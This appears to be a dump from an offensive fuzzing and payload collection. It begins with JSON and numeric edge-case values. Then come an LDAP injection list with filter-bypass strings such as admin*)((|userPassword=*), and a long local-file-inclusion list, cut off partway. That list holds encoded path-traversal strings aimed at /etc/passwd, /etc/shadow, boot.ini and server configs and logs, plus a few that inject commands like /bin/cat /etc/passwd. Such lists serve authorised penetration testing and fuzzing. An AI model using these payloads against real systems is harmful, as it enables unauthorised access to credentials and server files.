,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]
[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null]
1
-1
0
-999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
"\x00"
"1"
":test"
"\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\t\n\u000b\f\r\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f !\"#$%&'()*,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}
¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ"
"\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007\u0008\u0009\u000a\u000b\u000c\u000d\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f\u0020\u0021\u0022\u0023\u0024\u0025\u0026\u0027\u0028\u0029\u002a\u002b\u002c\u002d\u002e\u002f\u0030\u0031\u0032\u0033\u0034\u0035\u0036\u0037\u0038\u0039\u003a\u003b\u003c\u003d\u003e\u003f\u0040\u0041\u0042\u0043\u0044\u0045\u0046\u0047\u0048\u0049\u004a\u004b\u004c\u004d\u004e\u004f\u0050\u0051\u0052\u0053\u0054\u0055\u0056\u0057\u0058\u0059\u005a\u005b\u005c\u005d\u005e\u005f\u0060\u0061\u0062\u0063\u0064\u0065\u0066\u0067\u0068\u0069\u006a\u006b\u006c\u006d\u006e\u006f\u0070\u0071\u0072\u0073\u0074\u0075\u0076\u0077\u0078\u0079\u007a\u007b\u007c\u007d\u007e\u007f\u0080\u0081\u0082\u0083\u0084\u0085\u0086\u0087\u0088\u0089\u008a\u008b\u008c\u008d\u008e\u008f\u0090\u0091\u0092\u0093\u0094\u0095\u0096\u0097\u0098\u0099\u009a\u009b\u009c\u009d\u009e\u009f\u00a0\u00a1\u00a2\u00a3\u00a4\u00a5\u00a6\u00a7\u00a8\u00a9\u00aa\u00ab\u00ac\u00ad\u00ae\u00af\u00b0\u00b1\u00b2\u00b3\u00b4\u00b5\u00b6\u00b7\u00b8\u00b9\u00ba\u00bb\u00bc\u00bd\u00be\u00bf\u00c0\u00c1\u00c2\u00c3\u00c4\u00c5\u00c6\u00c7\u00c8\u00c9\u00ca\u00cb\u00cc\u00cd\u00ce\u00cf\u00d0\u00d1\u00d2\u00d3\u00d4\u00d5\u00d6\u00d7\u00d8\u00d9\u00da\u00db\u00dc\u00dd\u00de\u00df\u00e0\u00e1\u00e2\u00e3\u00e4\u00e5\u00e6\u00e7\u00e8\u00e9\u00ea\u00eb\u00ec\u00ed\u00ee\u00ef\u00f0\u00f1\u00f2\u00f3\u00f4\u00f5\u00f6\u00f7\u00f8\u00f9\u00fa\u00fb\u00fc\u00fd\u00fe\u00ff"
"\u0100\u0101\u0102\u0103\u0104\u0105\u0106\u0107\u0108\u0109\u010a\u010b\u010c\u010d\u010e\u010f\u0110\u0111\u0112\u0113\u0114\u0115\u0116\u0117\u0118\u0119\u011a\u011b\u011c\u011d\u011e\u011f\u0120\u0121\u0122\u0123\u0124\u0125\u0126\u0127\u0128\u0129\u012a\u012b\u012c\u012d\u012e\u012f\u0130\u0131\u0132\u0133\u0134\u0135\u0136\u0137\u0138\u0139\u013a\u013b\u013c\u013d\u013e\u013f\u0140\u0141\u0142\u0143\u0144\u0145\u0146\u0147\u0148\u0149\u014a\u014b\u014c\u014d\u014e\u014f\u0150\u0151\u0152\u0153\u0154\u0155\u0156\u0157\u0158\u0159\u015a\u015b\u015c\u015d\u015e\u015f\u0160\u0161\u0162\u0163\u0164\u0165\u0166\u0167\u0168\u0169\u016a\u016b\u016c\u016d\u016e\u016f\u0170\u0171\u0172\u0173\u0174\u0175\u0176\u0177\u0178\u0179\u017a\u017b\u017c\u017d\u017e\u017f\u0180\u0181\u0182\u0183\u0184\u0185\u0186\u0187\u0188\u0189\u018a\u018b\u018c\u018d\u018e\u018f\u0190\u0191\u0192\u0193\u0194\u0195\u0196\u0197\u0198\u0199\u019a\u019b\u019c\u019d\u019e\u019f\u01a0\u01a1\u01a2\u01a3\u01a4\u01a5\u01a6\u01a7\u01a8\u01a9\u01aa\u01ab\u01ac\u01ad\u01ae\u01af\u01b0\u01b1\u01b2\u01b3\u01b4\u01b5\u01b6\u01b7\u01b8\u01b9\u01ba\u01bb\u01bc\u01bd\u01be\u01bf\u01c0\u01c1\u01c2\u01c3\u01c4\u01c5\u01c6\u01c7\u01c8\u01c9\u01ca\u01cb\u01cc\u01cd\u01ce\u01cf\u01d0\u01d1\u01d2\u01d3\u01d4\u01d5\u01d6\u01d7\u01d8\u01d9\u01da\u01db\u01dc\u01dd\u01de\u01df\u01e0\u01e1\u01e2\u01e3\u01e4\u01e5\u01e6\u01e7\u01e8\u01e9\u01ea\u01eb\u01ec\u01ed\u01ee\u01ef\u01f0\u01f1\u01f2\u01f3\u01f4\u01f5\u01f6\u01f7\u01f8\u01f9\u01fa\u01fb\u01fc\u01fd\u01fe\u01ff\u0200\u0201\u0202\u0203\u0204\u0205\u0206\u0207\u0208\u0209\u020a\u020b\u020c\u020d\u020e\u020f\u0210\u0211\u0212\u0213\u0214\u0215\u0216\u0217\u0218\u0219\u021a\u021b\u021c\u021d\u021e\u021f\u0220\u0221\u0222\u0223\u0224\u0225\u0226\u0227\u0228\u0229\u022a\u022b\u022c\u022d\u022e\u022f\u0230\u0231\u0232\u0233\u0234\u0235\u0236\u0237\u0238\u0239\u023a\u023b\u023c\u023d\u023e\u023f\u0240\u0241\u0242\u0243\u0244\u0245\u0246\u0247\u0248\u0249\u024a\u024b\u024c\u024d\u024e\u024f\u0250\u0251\u0252\u0253\u0254\u0255\u0256\u0257\u0258\u0259\u025a\u025b\u025c\u025d\u025e\u025f\u0260\u0261\u0262\u0263\u0264\u0265\u0266\u0267\u0268\u0269\u026a\u026b\u026c\u026d\u026e\u026f\u0270\u0271\u0272\u0273\u0274\u0275\u0276\u0277\u0278\u0279\u027a\u027b\u027c\u027d\u027e\u027f\u0280\u0281\u0282\u0283\u0284\u0285\u0286\u0287\u0288\u0289\u028a\u028b\u028c\u028d\u028e\u028f\u0290\u0291\u0292\u0293\u0294\u0295\u0296\u0297\u0298\u0299\u029a\u029b\u029c\u029d\u029e\u029f\u02a0\u02a1\u02a2\u02a3\u02a4\u02a5\u02a6\u02a7\u02a8\u02a9\u02aa\u02ab\u02ac\u02ad\u02ae\u02af\u02b0\u02b1\u02b2\u02b3\u02b4\u02b5\u02b6\u02b7\u02b8\u02b9\u02ba\u02bb\u02bc\u02bd\u02be\u02bf\u02c0\u02c1\u02c2\u02c3\u02c4\u02c5\u02c6\u02c7\u02c8\u02c9\u02ca\u02cb\u02cc\u02cd\u02ce\u02cf\u02d0\u02d1\u02d2\u02d3\u02d4\u02d5\u02d6\u02d7\u02d8\u02d9\u02da\u02db\u02dc\u02dd\u02de\u02df\u02e0\u02e1\u02e2\u02e3\u02e4\u02e5\u02e6\u02e7\u02e8\u02e9\u02ea\u02eb\u02ec\u02ed\u02ee\u02ef\u02f0\u02f1\u02f2\u02f3\u02f4\u02f5\u02f6\u02f7\u02f8\u02f9\u02fa\u02fb\u02fc\u02fd\u02fe\u02ff"
"\"\\/Date(1335205592410)\\/\""
"\"\\/Date(-1)\\/\""
"\"\\/Date(1335205592410-0500)\\/\""
"2012-04-23T18:25:43.511Z"
"2012-04-21T18:25:43-05:00"
"Date(1335205592410)"
"new Date(1335205592410)"
eval("while(1);")
[,,,,]
null
================================================
FILE: attack/ldap/README.md
================================================
tool:
http://code.google.com/p/ldap-blind-explorer/
video:
http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/
================================================
FILE: attack/ldap/ldap-injection.txt
================================================
!
%21
%26
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%7C
\21
\26
\28
\29
&
(
)
*
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
(*)*)
*)*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y
================================================
FILE: attack/lfi/JHADDIX_LFI.txt
================================================
/.../.../.../.../.../
\…..\\\…..\\\…..\\\
%00../../../../../../etc/passwd
%00/etc/passwd%00
%00../../../../../../etc/shadow
%00/etc/shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
/../../../../../../../../%2A
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
=3D “/..” . “%2f..
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
admin/access_log
/admin/install.php
../../../administrator/inbox
/apache2/logs/access_log
/apache2/logs/access.log
/apache2/logs/error_log
/apache2/logs/error.log
/apache/logs/access_log
/apache/logs/access.log
../../../../../apache/logs/access.log
../../../../apache/logs/access.log
../../../apache/logs/access.log
../../apache/logs/access.log
../apache/logs/access.log
/apache/logs/error_log
/apache/logs/error.log
../../../../../apache/logs/error.log
../../../../apache/logs/error.log
../../../apache/logs/error.log
../../apache/logs/error.log
../apache/logs/error.log
/apache\php\php.ini
\\'/bin/cat%20/etc/passwd\\'
\\'/bin/cat%20/etc/shadow\\'
/.bash_history
/.bash_profile
/.bashrc
/../../../../../../../../bin/id|
/bin/php.ini
/boot/grub/grub.conf
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
..//..//..//..//..//boot.ini
../../../../../../../../../../../../boot.ini
../../boot.ini
..\../..\../..\../..\../boot.ini
..\../..\../boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini%00
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\AppServ\MySQL
C:/boot.ini
C:\boot.ini
/C:/inetpub/ftproot/
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
c:\inetpub\wwwroot\index.asp
/config.asp
../config.asp
config.asp
../config.inc.php
config.inc.php
../config.js
config.js
_config.php
../_config.php
../config.php
config.php
../_config.php%00
../../../../../../../../conf/server.xml
/core/config.php
/C:\Program Files\
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
/.cshrc
c:\System32\Inetsrv\metabase.xml
c:WINDOWS/system32/
d:\AppServ\MySQL
database.asp
database.js
database.php
data.php
dbase.php a
db.php
../../../../../../../dev
/D:\Program Files\
d:\System32\Inetsrv\metabase.xml
/etc/apache2/apache2.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/httpd.conf
/etc/apt/sources.list
/etc/chrootUsers
/etc/crontab
/etc/defaultdomain
/etc/default/passwd
/etc/defaultrouter
/etc/fstab
/etc/ftpchroot
/etc/ftphosts
/etc/group
/etc/hostname.bge
/etc/hostname.ce0
/etc/hostname.ce1
/etc/hostname.ce2
/etc/hostname.ce3
/etc/hostname.dcelx0
/etc/hostname.dcelx1
/etc/hostname.dcelx2
/etc/hostname.dcelx3
/etc/hostname.dmfe0
/etc/hostname.dmfe1
/etc/hostname.dmfe2
/etc/hostname.dmfe3
/etc/hostname.dnet0
/etc/hostname.dnet1
/etc/hostname.dnet2
/etc/hostname.dnet3
/etc/hostname.ecn0
/etc/hostname.ecn1
/etc/hostname.ecn2
/etc/hostname.ecn3
/etc/hostname.elx0
/etc/hostname.elx1
/etc/hostname.elx2
/etc/hostname.elx3
/etc/hostname.elxl0
/etc/hostname.elxl1
/etc/hostname.elxl2
/etc/hostname.elxl3
/etc/hostname.eri0
/etc/hostname.eri1
/etc/hostname.eri2
/etc/hostname.eri3
/etc/hostname.ge0
/etc/hostname.ge1
/etc/hostname.ge2
/etc/hostname.ge3
/etc/hostname.hme0
/etc/hostname.hme1
/etc/hostname.hme2
/etc/hostname.hme3
/etc/hostname.ieef0
/etc/hostname.ieef1
/etc/hostname.ieef2
/etc/hostname.ieef3
/etc/hostname.iprb0
/etc/hostname.iprb1
/etc/hostname.iprb2
/etc/hostname.iprb3
/etc/hostname.le0
/etc/hostname.le1
/etc/hostname.le2
/etc/hostname.le3
/etc/hostname.lo
/etc/hostname.pcn0
/etc/hostname.pcn1
/etc/hostname.pcn2
/etc/hostname.pcn3
/etc/hostname.qfe0
/etc/hostname.qfe1
/etc/hostname.qfe2
/etc/hostname.qfe3
/etc/hostname.spwr0
/etc/hostname.spwr1
/etc/hostname.spwr2
/etc/hostname.spwr3
/etc/hosts
../../../../../../../../../../../../etc/hosts
../../../../../../../../../../../../etc/hosts%00
/etc/hosts.allow
/etc/hosts.deny
/etc/hosts.equiv
/etc/http/conf/httpd.conf
/etc/httpd.conf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/squirrelmail.conf
/etc/httpd/conf.d/ssl.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
../../../../../etc/httpd/logs/access_log
../../../../../etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../etc/httpd/logs/error_log
../../../../../etc/httpd/logs/error.log
/etc/httpd/php.ini
/etc/http/httpd.conf
/etc/inetd.conf
/etc/init.d/apache
/etc/init.d/apache2
/etc/issue
